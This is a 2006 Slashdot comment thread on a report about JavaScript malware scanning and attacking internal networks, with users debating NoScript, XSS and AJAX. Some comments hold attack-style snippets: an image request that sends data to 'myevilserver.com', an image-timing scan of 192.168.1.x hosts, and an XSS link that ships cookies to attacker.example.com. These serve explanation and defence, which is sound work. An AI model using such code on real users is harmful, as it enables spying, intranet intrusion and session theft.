JavaScript Malware Open The Door to the Intranet

An anonymous reader writes "C|Net is reporting that JavaScript malware is opening the door for hackers to attack internal networks. During the Black Hat Briefings conference Jeremiah Grossman (CTO, WhiteHat Security) '...will be showing off how to get the internal IP address, how to scan internal networks, how to fingerprint and how to enter DSL routers ... As we're attacking the intranet using the browser, we're taking complete control over the browser.' According to the article, the presence of cross-site scripting vulnerabilities (XSS) dramatically increases the possible damage that can be caused. The issue is also not which browser is more secure, as all major browsers are equally at risk. Grossman says 'The users really are at the mercy of the Web sites they visit. Users could turn off JavaScript, which really isn't a solution because so many Web sites rely on it.'"
  • Caveman Zonk edit headline bad.
  • NoScript (Score:5, Informative)

    by dvice_null ( 981029 ) on Sunday July 30, 2006 @06:45AM (#15810499)
    Why can't users just install Firefox and the NoScript extension for it? Then JavaScript will be disabled by default, but the user can whitelist the sites where JavaScript should be enabled. Problem solved.
    • Re:NoScript (Score:5, Informative)

      by rdwald ( 831442 ) on Sunday July 30, 2006 @06:59AM (#15810530)
      In addition to blocking JavaScript on non-whitelisted sites, NoScript also prevents Flash and Java from loading unless you specifically allow them on a case-by-case basis. All of those stupid Flash ads will be gone, but you can still view everything you want to! It's a great extension.
      • And people will do it anyway, thinking they are 'safe'.

      • Feature creep? (Score:2, Interesting)

        by vain gloria ( 831093 )
        It also blocks the <a ping> attribute, something which won't be introduced until Firefox 2 and for which it's possible to set a pref in about:config. Also, it doubles as an egg timer!

        Seriously, NoScript is great, but if I want to block flash I'll install Adblock or Flashblock. If I want to whitelist sites for javascript then I'll use NoScript. Whatever happened to the concept of simply doing one thing well?
      • These kinds of problems (and my disinterest in bells and whistles and disdain for being FORCED to turn on JavaScript to read a frackin' web page) are why I want to yell, "turn that shit off!"

        So, I ONLY activate JavaScript in Konqueror on a page-by-page basis. I have it AND Java turned off by default. When the page is done, I destroy the history folder and sometimes nuke the cookies. I also filter in my firewall at the eth device and LAN device, as well as at the ports and in Konqueror's cookies manager.
        • While I don't use NoScript (instead I have an inline web-proxy to filter all my browsers) I don't consider it overreacting. My default here is no cookies, no scripts, no flash, no referrer, no blinking text, no nothing. Just the text Ma'am. This proxy rewrites the HTML on the fly ;-). There are a few, very few, sites where I do enable some things, but I've had it with sites that require anything more than basic HTML.
    • Re:NoScript (Score:5, Insightful)

      by Anonymous Coward on Sunday July 30, 2006 @07:00AM (#15810533)
      The problem is not necessarily the web browsers (and most people don't even use Firefox, let alone have heard of that extension). The problem is the websites that don't properly take steps to protect against XSS (e.g. HTML-encode user input).

      Most recently we saw this problem in Netscape's portal.

      http://blog.outer-court.com/archive/2006-07-26-n73.html [outer-court.com]

      Developers need to start thinking not only about how to solve the particular business problem but also about how their code could be potentially abused by attackers and take active steps to mitigate that risk.
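
      As a rough sketch of the HTML-encoding idea above (the escapeHtml name, the element id and the sample input are made up for illustration), the defence is simply to encode user-supplied text before it is written into the page:

        function escapeHtml(text) {
          // Encode the characters that let user input break out into markup.
          // The ampersand must be handled first so the other entities survive.
          return text.replace(/&/g, "&amp;")
                     .replace(/</g, "&lt;")
                     .replace(/>/g, "&gt;")
                     .replace(/"/g, "&quot;")
                     .replace(/'/g, "&#39;");
        }

        // A "<script>" payload now renders as harmless text instead of executing.
        var userComment = "<script>doSomethingEvil()</script>";
        document.getElementById("comments").innerHTML = escapeHtml(userComment);
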
      • Re:NoScript (Score:2, Informative)

        by Asztal_ ( 914605 )
        Funnily enough, Internet Explorer actually warns you when an untrusted site links to a trusted one. I don't know of any other browsers which do this :)
      • I am not a developer; that is, I do not do development full time professionally. I am an IT consultant, which means that I end up being a jack of all (PR related) trades. In addition to helping clients find the , I occasionally do web development. I am a functional programmer. I can write code that does the task at hand; and, I try to write clear maintainable code. I am not an expert in any particular development language; and, I do not have the time or interest to become fully conversant in the state of
        • Re:NoScript (Score:3, Insightful)

          Dude, you must be a troll, but I'll bite. That is just such a load of bullshit, you could *never* be an IT consultant. First of all, if you are coding, you aren't a consultant - a consultant "consults" i.e. you advise the customer on the best course of action to achieve a certain goal. This may be architectural, infrastructure, security, or any other field, but it is *advice* - a good consultant is too *expensive* to be sitting there knocking out code. If your customer can afford to have you write (evidentl
          • Agreed on original poster's careless attitude, but I gotta comment on your definition of consultant. I'm a consultant, and I definitely spend my share of time cranking code. Is it cost-effective to a company that has engineers on staff? No, I charge an arm & a leg. But, for one-off gigs that don't justify a hire & for companies that don't have the available coding resources it does make sense.

            I guess you can make a semantic argument that when I take this role, I'm an engineering contractor instead
          • I envy you the world you live in, it sounds so much better than the one I live in. In the one I live in, large organizations regularly hire consultants at $100+ an hour to write code, sometimes even ignoring in-house developers who could do the work cheaper. In the world I live in, management frequently rewards people who save time and money by doing shoddy security and penalizes people who want to spend a few percent more to do pervasive, correct security.
          • Talk about trolling....

            Actually, IT consultants often do come in to code/design/mentor. Likewise, they are often required to help implement their own recommendations. Not surprisingly, many shops which require a consultant to come in, also lack the inhouse knowledge to implement the resulting recommendation. This may be from a lack of industry knowledge or because their in house talent can only tackle 95% of the problem domain and need help with the last 5%. And yes, sometimes that last 5% can take many
          • Come off it, have some pity on the tired beast.

            Your definition of consultant is so narrow that no camel will ever go through that needle's eye. Not even a mini camel.

            Consulting is understood as the providing of professional services in an area; the nature of the gig may be advisory, but it can also be doing technical work. What you need is somebody who can step into a position running. Anybody capable of doing that will fit the definition of most sane people.

            In your ayatollah-like zeal you make half a point: people
        • What I don't understand is why the other two who replied to you had to be so visceral about it. A simple "No, no, here's what you can do to make sure things are secure" would have sufficed, but instead one had to resort to calling you a troll and the other had to call you a con.

          Alas, I'm realizing that is a common experience on Slashdot. I always imagined geeks who were full of themselves, I guess I had to come here to really find them.

          Anyway, just brush that off, take the good from what they had to say,
        • I can see what a good developer you are when it comes to security... Just clicking around your site tells me you run it on Windows and that your webroot is D:\justinzane_com. Why, why, why would you do a print_r of your server variables on your site??
    • Re:NoScript (Score:3, Informative)

      by Anonymous Coward
      You missed what they are saying. Even if you whitelist a website, that site can be cross-site scripted and become infected.
      RTFA.
    • Problem Solved? (Score:3, Interesting)

      by Petersko ( 564140 )
      "Then Javascript will be disabled by default, but user can whitelist the sites where Javascript should be enabled. Problem solved.

      The consequences of disabling Javascript can lead to a host of new problems. I used to disable javascript and enable it by whitelist. Then I registered a piece of shareware, paid by credit card, and waited. Of course since the whitelisted servers forwarded off to some other entity which provided the registration pages, it never came back. So I figured out the servers that it
      • NoScript just blocks the javascript... it doesn't send it off to somewhere else, nor does it create any "whitelist". If you're at a site that you need Javascript to run, the little icon down in the lower right hand corner will have a pop-up menu to enable Javascript for that site you're on. You can have it enabled just for that session or permanently.

        I've used NoScript now for quite a while and I love it.
        • If you're at a site that you need Javascript to run, the little icon down in the lower right hand corner will have a pop-up menu to enable Javascript for that site you're on. You can have it enabled just for that session or permanently.
          You just described a whitelist.

          His TRANSACTION was sent off elsewhere, to another site, and because THAT site hadn't been whitelisted, he didn't get an acknowledgement that his payment had been accepted.

          I know you no-script fanboys can't stand the idea that your favorite
    • Why can't users just install Firefox and the NoScript extension for it?

      Why not just install Opera 9 and use the new site management capability to manage JavaScript? You can disable JavaScript by default for all sites, and only allow JavaScript to run on those sites that you trust.

    • Why can't users just run any browser, including those which don't support JavaScript? I would like to use Dillo, but many websites require JavaScript, even for things which shouldn't need it. Why must they do this?
      • Because JS is the "wave of the future"! Everyone wants JS, even for crap like viewing an image! Who needs the [img] tag, let's pepper the html with document.write, because that makes everything so much easier!

        Uhh...

        Yeah really I don't get it either.

        I always browse with JS turned off and only enable it when I really, absolutely need to, or on sites I really trust. I figure, any other sites are a)using it for fluff I don't care about (like fancy dropdown menus that have no business using JS) or b) probably
      • Re:NoScript (Score:3, Insightful)

        To provide a decent UI for the user, you sometimes have to 'require' JS. For example, if you want to maintain a session when the user isn't actively clicking on links (especially when you need to know who is actually online, e.g. see my link), you need to use xmlrpc (sometimes a meta refresh just won't do).

        If you want a 'You have received mail' popup, you need JS; same with drag/drop, client-side validation (along with server-side, obviously), client-side updates of something that is happening server-side (eg: t
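
        As a small sketch of that keep-alive idea (the /ping URL and the 30-second interval are invented, and this uses the plain XMLHttpRequest/ActiveX objects of 2006-era browsers rather than any particular library):

          // Tell the server every 30 seconds that this user is still online.
          function ping() {
            var xhr = window.XMLHttpRequest ? new XMLHttpRequest()
                                            : new ActiveXObject("Microsoft.XMLHTTP"); // older IE
            xhr.open("GET", "/ping", true);  // relative URL, so the request stays on the originating site
            xhr.send(null);
          }
          setInterval(ping, 30000);
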
    • Yeah, I've used NoScript.
      The problem is that so many sites pointlessly rely on JavaScript;
      large numbers of them are unnavigable without it enabled.

      If I blocked javascript on all sites that I visited that I didn't completely trust then I wouldn't be able to use a large number of sites. It's a problem of idiot web developers who don't know what they are doing, but think it will be COOL!
      eg. non web application sites using 'AJAX' because it's the new cool thing.

      • This is a big problem. I'm a big fan of Ajax techniques, but only for use in web applications or downgradably. Downgradable design needs to be stressed and restressed to Ajax developers: build the website in HTML first, then it's easy to add Ajax goodies simply by returning false in the "onclick"s of links. If the serverside script follows the MVC pattern, it'll be easy to add a JSON-producing View to talk to JavaScript.
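
        A minimal sketch of that downgradable pattern (the URL, the content element and the loadPage helper are hypothetical): the link works as an ordinary link with JavaScript off, and returning false from the onclick cancels the navigation when the Ajax path takes over.

          <a href="/article/42" onclick="return loadPage(this.href);">Read more</a>

          function loadPage(url) {
            var xhr = new XMLHttpRequest();
            xhr.open("GET", url + "?format=json", true);  // hypothetical JSON-producing View
            xhr.onreadystatechange = function () {
              if (xhr.readyState === 4 && xhr.status === 200) {
                var data = eval("(" + xhr.responseText + ")");  // 2006-era JSON parsing
                document.getElementById("content").innerHTML = data.html;  // hypothetical field
              }
            };
            xhr.send(null);
            return false;  // suppress the normal navigation; without JS the href still works
          }
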
    • I would however like to finally obsolete the User-Agent request header for a Standards/Capabilities header. It's possible to detect JavaScript support, Flash capabilities, sure.. but it should simply be something the client tells the server in the request in the first place.

      I'm currently playing around with AJAX (shameless plug: a MySpace with better usability in PHP [robertjognkaper.com]) but because I can't see if JavaScript is on or off on the server side easily, I have to generate pages which include interface definitions fo
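
      One common workaround for that server-side detection problem (not necessarily what the parent settled on) is to let JavaScript set a cookie on the first page view, so every later request tells the server whether scripting is available; the cookie name here is arbitrary:

        // If this runs at all, the browser has JavaScript enabled; the server can
        // check for the js=1 cookie on later requests and skip the no-JS fallbacks.
        document.cookie = "js=1; path=/";
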
    • Why can't users just install Firefox and the NoScript extension for it? Then JavaScript will be disabled by default, but the user can whitelist the sites where JavaScript should be enabled. Problem solved.

      Not quite, you see that means you have to trust the web-sites you use to not allow any XSS attacks. For example, I imagine that most people would not have second thoughts about trusting altavista.com, however, clicking on a crafty link [altavista.com][1] to this site could result in serious trouble.

      The only solution that i
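      For illustration, a 'crafty link' of this kind typically points at a search or error page that echoes a query parameter back into the HTML without encoding it; the hostnames and parameter below are invented, and in practice the script payload would be URL-encoded:

        http://vulnerable-search.example.com/search?q=<script>document.location="http://attacker.example.com/log?c="+document.cookie</script>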

      • Now that is a crafty link I'd never have thought of. It really underlines the importance of sanitizing user input.
  • by pieterh ( 196118 ) on Sunday July 30, 2006 @06:46AM (#15810502) Homepage
    Giving JavaScript the power to do random network accesses may make AJAX possible, but code running in my browser has no business accessing my local intranet. For that matter, I'm uncomfortable with JavaScript applications 'phoning home' without my knowledge.

    So, the fix is to treat all attempts by JavaScript in a browser as 'hostile until proven otherwise', and to ask for user confirmation when such attempts happen. Put a firewall around the browser and treat any code running in it as dangerous by default.

    I predict 2 weeks before there's a Firefox update for this, and 2 years before MSIE fixes the problem.
    • by ergo98 ( 9391 ) on Sunday July 30, 2006 @06:54AM (#15810514) Homepage Journal
      Giving JavaScript the power to do random network accesses may make AJAX possible

      The XmlHttpRequest functionality doesn't allow "random network access", but instead is limited to calling the source website (in all browsers but IE; in IE the requests can go anywhere).

      I predict 2 weeks before there's a Firefox update for this, and 2 years before MSIE fixes the problem.

      Fix what though? The submission seems to be that someone has a big surprise that they're going to release at a conference, and for all we know they could be full of shit, talking big to get a lot of attention. Personally I would rather that this story was shelved until there are actual details that can be addressed/rebutted. Instead it's like lame nightly news teasers.

      "Coming tonight at 11 - Someting ordinary in your home that can KILL YOU! Now back to The Family Guy."
      • What might be smart is an extension hooking into the security subsystems in Firefox to allow the browser to go into "Paranoid Mode" when browsing any site not on the user's favourites or safe-list.

        Paranoid Mode would block all plugins, cookies and javascript, and optionally have a "click-to-load" button in place of content from other servers
      • (in all browsers but IE. In IE the requests can go anywhere).

        I'm not sure about that. I ran into the same security restrictions in IE that exist in the other browsers when using AJAX. The only solution to the problem was to get rid of the 'www' in the URL, EVER - so users always browse on http://thesite.com./ [thesite.com.]
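        A small sketch of the restriction being described, assuming the page itself was served from http://thesite.com (the hostnames have to match exactly, so the www. variant counts as a different origin):

          var xhr = new XMLHttpRequest();
          try {
            // Page origin is http://thesite.com, so the www. host is cross-origin
            // and the browser rejects the call with a security/permission error.
            xhr.open("GET", "http://www.thesite.com/data", true);
            xhr.send(null);
          } catch (e) {
            alert("Blocked by the same-origin policy: " + e);
          }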

        By the way, about your sig:

        "Coming tonight at 11 - Someting ordinary in your home that can KILL YOU! Now back to The Family Guy."

        I hate when stations do that. It's like.. if it's so deadly isn't it kin

      • The XmlHttpRequest functionality doesn't allow "random network access"
        XmlHttpRequest doesn't allow XSS but Dynamic Scripting does, e.g [webstaa.com].
        I haven't tried using Dynamic Scripting to access local domains / addresses but it does work for non-originating sites.
        Also, I don't believe that IE does allow Cross Site AJAX.
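
        A rough sketch of the dynamic-scripting trick mentioned above (the URL and callback name are made up): a script element, unlike XMLHttpRequest, may point at any host, and whatever that host returns executes in the page.

          function fetchCrossSite(url) {
            // Script elements are not covered by the XMLHttpRequest same-origin rule.
            var s = document.createElement("script");
            s.src = url;  // e.g. "http://other-host.example.com/data.js?callback=handleData"
            document.getElementsByTagName("head")[0].appendChild(s);
          }

          // The remote server is expected to respond with something like:
          //   handleData({"message": "hello from another site"});
          function handleData(data) {
            alert("Received from another origin: " + data.message);
          }
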
    • by Goaway ( 82658 ) on Sunday July 30, 2006 @06:57AM (#15810527) Homepage
      document.createElement("img");
      img.src="http://myevilserver.com/phonehome.cgi?evi lspyingdata="+encodeURIComponent(evilspyingdata);
      document.body.appendElement(img);


      Oops! I just phoned home without using XMLHttpRequest! How are you going to firewall that one out?
      • As said: the problem is not the XMLHttpRequest that can be done: this is site bound in Firefox. (I think it's domain bound, not site bound actually, but ok)

        The problem is the ability of a homepage to be spread over different servers and locations. The only solution I see is getting images to be domain bound too.

        This solution will only work if it is set on all possible media that is embedded in the page, allowing only relative links for embedded media. Of course, this would totally destroy most parts of t

      • Site attempts to load image navbar1.gif. Do you want to allow it? [ ] Don't ask next time ALLOW | DENY
        Site attempts to load image navbar2.gif. Do you want to allow it? [ ] Don't ask next time ALLOW | DENY
        Site attempts to load image navbar3.gif. Do you want to allow it? [ ] Don't ask next time ALLOW | DENY
        Site attempts to load image navbar4.gif. Do you want to allow it? [ ] Don't ask next time ALLOW | DENY
        Site attempts to load image navbar5.gif. Do you want to allow it? [ ] Don't ask next time ALLOW | D
    • by roman_mir ( 125474 ) on Sunday July 30, 2006 @10:23AM (#15811251) Homepage Journal
      this is not insightful, it's silly. This is not even about JAVASCRIPT. An HTML page can access resources from anywhere on the web. And so if JAVASCRIPT is used to access one of those resources (an HTTP request, as in the HTML IMG tag for example), then this problem cannot be fixed at the JAVASCRIPT level.

      An HTML page can access an image on a third party server via a normal html tag, a javascript can facilitate that access, that's about it. In that http request parameters can be hidden that provide information about your session.

      The trick with JAVASCRIPT scanning your local network is actually this exact feature: a browser allowing an HTML page to load resources from anywhere on the network. JAVASCRIPT is used to manipulate the DOM of the HTML, the GUI event model and the HTTP requests. So the fundamental question is this: should an HTML page be allowed in principle to access resources from third-party servers and not just from its own server?

      But then you are questioning the entire Hyper Text idea - the linking of the Internet.

      This most certainly will not be fixed in the next release of ANY browser.
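
      As a rough sketch of how that feature becomes an intranet scanner (in the spirit of the demo people describe testing further down the page, which guesses hosts from how quickly a probe fails): the address range, probe path and timings below are made up.

        function probe(ip) {
          var img = new Image();
          var started = new Date().getTime();
          function report(result) {
            alert(ip + ": " + result + " after " + (new Date().getTime() - started) + " ms");
          }
          img.onload = function () { report("served an image - web server found"); };
          // onerror fires quickly when something answered (connection refused or
          // non-image content) and only after a long timeout when nothing is there,
          // so the elapsed time is the real signal.
          img.onerror = function () { report("error"); };
          img.src = "http://" + ip + "/favicon.ico";  // hypothetical probe URL
        }

        // Walk part of a private address range, one probe per host.
        for (var i = 1; i <= 10; i++) {
          probe("192.168.1." + i);
        }
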
  • How's this news? (Score:2, Insightful)

    by Anonymous Coward
    A portscanner in javascript is trivial and it runs on the client machine behind the corporate firewall. This isn't news, this has been common knowledge for ever. This is why javascript is disabled throughout any organization that takes security seriously. I find it amusing that this only gets planted in the news when certain large tech companies are pushing ajax to replace desktop apps.

    It's not just JavaScript; Flash content, ActiveX and Java applets should all be disabled site-wide. Any network admin that

    • Because it worked so well for the KGB. KGB agents planted by photocopiers to ensure the wrong documents didn't get copied. Typewriters with unique typefaces in a single nonstandard size so that official documents couldn't be faked. Yes, if you are restrictive enough eventually you can bring everything crashing to a halt. However, the concept that everything is forbidden except what is compulsory has hardly proven the most successful business paradigm. IT is supposed to be an enabling technology, not a disab
    • Comment removed (Score:5, Informative)

      by account_deleted ( 4530225 ) on Sunday July 30, 2006 @11:07AM (#15811520)
      Comment removed based on user account deletion
  • by CdBee ( 742846 ) on Sunday July 30, 2006 @07:03AM (#15810538)
    For about a year now I have routinely installed a whitelisting Firefox extension called NoScript [noscript.net].
    It blocks javascript per-site until I choose to whitelist the site: Not only do I get a great deal fewer annoyances interrupting my browsing, but it also cuts out a lot of web advertising (the AdBlock extension makes my browser drag when fully loaded with filters)
  • WMVs (Score:4, Insightful)

    by CosmeticLobotamy ( 155360 ) on Sunday July 30, 2006 @07:16AM (#15810571)
    This is slightly off-topic, but it's kind of relevant to the solution of turning JavaScript off. Can anyone explain to me why JavaScript is required in Firefox to open a .wmv file (in Windows, obviously)? And more importantly, what bug makes Firefox crash about 33% of the time when visiting a site that has one on it when JavaScript is disabled? What are the odds that bug is overflow exploitable?
  • by Anonymous Coward on Sunday July 30, 2006 @07:56AM (#15810655)
    I have been asking for years why we can't disable JavaScript for all but trusted sites (in Phoenix/Firefox/etc.) via a config facility. The default when browsing should be OFF.

    Websites need to stop using javascript for conveying simple information. That Flash crap too. Most people just laugh when I say javascript is a security hole.

  • And it found some, but not all, of the web-enabled devices on my network. It found my web server and correctly identified it as Apache, found the squid proxy running on the gateway/firewall machine (identified as "unknown"), but failed to find my wireless router (through which it had to pass in order to see the rest of my network), or my print server. It also identified as "exists" several IP addresses on which no machine or device exists.

    But the Firefox "NoScript" extension completely blocked it until I told i
    • Roughly the same here in Firefox - it found the webserver on my local machine (though it couldn't identify it), didn't find the Netgear wireless router (possibly down to the password-protection on it), and about every third IP address was incorrectly identified as existing. (In Konqueror, it found my local machine, but not the webserver running on it).
    • ***but failed to find my wireless router (through which it had to pass in order to see the rest of my network), or my print server. It also identified as "exists" several IP addresses on which no machine or device exists.***

      Doesn't the second part of that make you a little nervous? One possibility is that it is finding your router and print server, but not where they are supposed to be. Could be an error in the program, but it could be some 'feature' of your network environment that you'd like to know a

    • But the Firefox "NoScript" extension completely blocked it until I told it to temporarily allow the host site.

      And that's lovely, until you realize that not everyone runs Firefox and in many corporate environments, IE is still the de facto standard. Hoping a browser will rescue application developers from bad security design is like hoping Paris Hilton wins a Nobel Prize.

      Security starts with code; if the code isn't secure, then you're asking for trouble. Programming classes in colleges and tech institut

  • by bateleur ( 814657 ) on Sunday July 30, 2006 @08:14AM (#15810718)
    So in response to a post saying a particular technology has security holes, the consensus "solution" is not to use that technology?

    That seems weak to me. By all means propose replacement solutions that do the same job, but by saying "don't use it" all you're really doing is saying "I personally have little use for it".

    Sysadmins should all disable Javascript?! Fine, go ahead, I'll move to a company with less demanding security requirements. You'll find your network's impressively secure once there are no users left.
    • Or that will be the only company with users left, after the rest are compromised.

      Running everything over http.... I would rather not be a sysadmin at a company which does that.
    • So in response to a post saying a particular technology has security holes, the consensus "solution" is not to use that technology?

      Never heard of Windows, have you?

      At what point does continually patching and repatching a fundamentally insecure technology become futile?
      • Never heard of Windows, have you?

        In my dreams. <sigh>

        It's a good example, though. I need to use Windows for two main reasons. First, because so much software is written only to run on Windows. Second, because customers use Windows and I need to be able to test and debug in an environment matching theirs. As such, no matter how buggy or insecure Windows may be either now or in the future it will never be "futile" for me to use it. (Just infuriating on occasion.)

        Javascript is not quite such a cle
  • ...I think this is only relevant to IE and MS [again]. As for sending commands to a 'router' to turn on wireless (if I even had a router with wireless), that is pants unless the 'owner' of the router isn't the person using it (i.e. an ISP package). The interface must be open to allow this to happen.

    So, the problem is with MS (again) and 'Harry Homeowner' type people who don't have a clue about anything and just run with the flow [OK].
  • Missing the point (Score:4, Interesting)

    by Minwee ( 522556 ) <dcr@neverwhen.org> on Sunday July 30, 2006 @08:54AM (#15810835) Homepage
    "Users could turn off JavaScript, which really isn't a solution because so many Web sites rely on it."

    Yes it is. Users could also politely point out to the authors and administrators of the majority of web sites which rely on javascript that they really, absolutely, positively don't need it. You don't need javascript to open a link to another page. You don't need javascript to open an image in a gallery. You don't need javascript to submit a username and password. You just don't need it. I would say that using scripted actions for that is lazy and stupid, but it actually involves a good deal more work than using proper HTML. That makes it just plain stupid.

    For the rare applications which actually require JavaScript and don't just use it as some kind of prosthetic wiener replacement, there is always the option of enabling scripting on a site-by-site basis. Turning scripting on for http://trusted.internal.site.on.your.local.net/ [local.net] but not for http://random.russian.warez.and.porn.site/ [porn.site] really is a solution.

    • There are some cases where it makes delivery of dynamic content a bit easier by offloading some of the processing to the client, but I'm convinced that a large part of the reason some sites use Javascript is to make it harder to deeplink their site. Sort of like the old disabling-context-menus trick, which, by the way, I'm really glad doesn't work in Firefox (the dialog box saying it's disabled still pops up, but you also still get the context menu).
    • by gnuman99 ( 746007 ) on Sunday July 30, 2006 @10:52AM (#15811427)
      You don't need javascript to open a link to another page. You don't need javascript to open an image in a gallery. You don't need javascript to submit a username and password. You just don't need it.

      You don't need it - you want it. You want it to make the entire web experience better.

      From a security standpoint, everyone should be on Lynx or a similar browser. From the user standpoint, Javascript is essential (see maps.google.com, or gmail) for a good web experience. Images are fundamental. The web is not static HTML any more. We now live in the world of DHTML and security is just going to have to deal with it.

      Javascript is broken if it allows you to access anything other than resources from the originating website and some settings available to it from the browser (window size, etc.). That's what it is there for and other uses should be disabled. We already see it with the JS popup blockers. Similar security for network accesses should suffice.

      Similarly with Java, Flash and other things.
      • "You don't need it - you want it. You want it to make the entire web experience better."

        Except when I don't because it makes my entire experience much worse. A particular peeve of mine is image galleries which tie javascript actions to each thumbnail so that they will all open in the same external window. What I _want_ to do is to middle-click a few of the images which look interesting, open them each up in separate tabs, read the article, and then look at the full sized pictures when they are all done

      • You don't need it - you want it. You want it to make the entire web experience better.

        Nonsense. Using javascript for any of the things the parent mentioned is regressive. Apart from the things the sibling posters have mentioned, it can also break:

        • The back button.
        • Standard link coloring.
        • Usage by the visually impaired.
        • Spidering and automated analysis of all sorts.
        • Page access on limited devices such as PDA's and kiosks.
        • Portability.
        • Maintainability.
        • User interface responsiveness.

        All this lost for ze

      • We already see it with the JS popup blockers. Similar security for network accesses should suffice.

        At what point do you STOP adding on patches as vulnerabilities become known, and give up on JS as the poorly thought-out and fundamentally insecure standard that it is?

        Images are fundamental.

        Images are no more a security threat than HTML. Sure, you can have a buffer overflow in an image, but the same goes for HTML code. Javascript is an altogether different animal. It's not being used as buffer overflows a

  • OSes or third parties now have an opportunity:

    Sandbox web-enabled applications, either individually or as a set.

    Even better: Sandbox sessions. Any address I type into my web browser, any link I open from a saved bookmark, or any link I open with a "open in new sandbox" command, gets a new sandbox.

    For home users, sandboxes get access to just the default gateway, they can't touch 127.0.0.1 or 192.168.1.x. They get read-only access to parts of the filesystem, such as where Java applets are stored, and read-
  • by shwonline ( 992049 ) on Sunday July 30, 2006 @09:04AM (#15810869)
    Ah, the simpler days of gray backgrounds and Times New Roman. None of these fancy tables, neither. And we had to walk 5 miles to school, uphill, in snow up to our hips. And 10 miles uphill to get back home. Kids today with their fancy JavaScript. No appreciation, none at all.
  • Firefox NoScript? (Score:2, Interesting)

    by kintarowins ( 820651 )

    How anyone can just not use a simple extension to block scripts, flash, java, etc like the Firefox NoScript extension is just confusing to me. People actually seem to want to run foreign applications on their system through sites which can quite easily load anything they want.

    Make it clear to your family that the modern Internet is like the real world. Protecting your computer with either a secure Internet Explorer (eg: the default Windows 2003 IE config) or Mozilla Firefox (with the NoScript and CookieSa

  • The detection of IP addresses that aren't running webservers seems to depend entirely on the time taken for the request to fail - long delays are detected as non-existent IP addresses, whereas short ones are reported as IP addresses without a webserver. This doesn't always work - it seems to give false positives if the IP address is detected as nonexistent too quickly, and could give false negatives on slow or unreliable links.

    In addition, if a machine has a webserver on it but requests for / give an err
  • Wide Area Network distributed computing has evolved in a bad way. Web standards are not designed for remote interactive applications and operating systems are not designed for executing remote code.

    We just need to redesign the thing from the bottom up, now that we have learned the ups and downs.
  • by Anonymous Coward
    The vast, vast majority of exploits involve JavaScript in one way or another. If it were possible to just "turn off" JavaScript world-wide overnight, the number of exploits would drop down substantially. Of course you would still have the "stupid user" problem, but you can only do so much to combat that.

    As far as browsers are concerned, a large percentage of exploits are being written by / for criminal elements for profit. To this end, they maximize their profit potential by targeting the most prolific b
  • by Myria ( 562655 )
    JavaScript is not *supposed* to be able to do bad things like this. It has many safeguards built into it to avoid this.

    The real problem is that the browsers have bad code in their JavaScript implementations. This is what needs to be fixed.

    Also, web browsers probably should run using CreateRestrictedToken. I wish web browsers would run with lower privilege than your normal user applications. You could have 2 processes, one that runs at normal privilege and one that runs as a restricted token. Almost the

"An idealist is one who, on noticing that a rose smells better than a cabbage, concludes that it will also make better soup." - H.L. Mencken

Working...